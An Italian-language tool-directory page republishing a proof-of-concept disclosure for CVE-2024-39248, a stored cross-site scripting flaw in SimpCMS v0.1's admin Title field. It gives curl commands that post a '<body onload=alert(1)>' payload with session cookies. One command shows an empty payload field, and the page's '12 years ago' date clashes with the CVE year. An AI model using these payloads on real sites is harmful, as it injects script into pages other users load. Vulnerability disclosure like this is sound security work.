Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-39248 — Pubblicazione per Cross-Site Scripting (XSS) in SimpCMS v0.1 - /SimpCMS/admin.php | Kitploit
Strumenti/GitHubGitHub/jasonthename/cve-2024-39248
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubjasonthename/cve-2024-39248

CVE-2024-39248

Pubblicazione per Cross-Site Scripting (XSS) in SimpCMS v0.1 - /SimpCMS/admin.php

Vedi Repository
12 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Titolo Exploit: SimpCMS v0.1 - Cross Site Scripting (XSS)

CVE: CVE-2024-39248

Autore Exploit: Jason Jacobs (0xjason_jacobs - Twitter)

Homepage del fornitore: https://sourceforge.net/projects/simpcms/

Endpoint vulnerabile: /SimpCMS/admin.php

Una vulnerabilità di cross-site scripting (XSS) in SimpCMS v0.1 consente agli attaccanti di eseguire script web arbitrari o HTML tramite un payload manipolato iniettato nel campo Title su /admin.php.

Parametri del comando cURL aggiornati per la versione di SimpCMS live su SourceForge:

Dopo aver effettuato l'accesso all'interfaccia di amministrazione di SimpCMS, copia i rispettivi valori dei Cookie osservati nella scheda Application dell'elemento Inspect del browser e invia la seguente richiesta curl:

curl -X POST "http://site.com/SimpCMS/admin/index.php" -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0"

comando

poc

Parametri dalla presentazione iniziale del CVE (Lo stesso exploit funziona):

I parametri iniziali osservati per il software SimpCMS hanno prodotto il seguente comando cURL, ma successivamente aggiornato:

curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"

Spiegazione:

  • curl: lo strumento a riga di comando per trasferire dati con URL.
  • -X POST: specifica il metodo di richiesta da utilizzare (POST).
  • "http://site.com/SimpCMS/admin.php": l'URL a cui viene inviata la richiesta.
  • -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0" - Il payload della richiesta POST.

Esegui questo comando nel tuo terminale per inviare la richiesta POST con il payload XSS. Visita il sito principale /SimpCMS e l'XSS sarà visibile.

CWE: https://cwe.mitre.org/data/definitions/79.html

Scarica lo strumento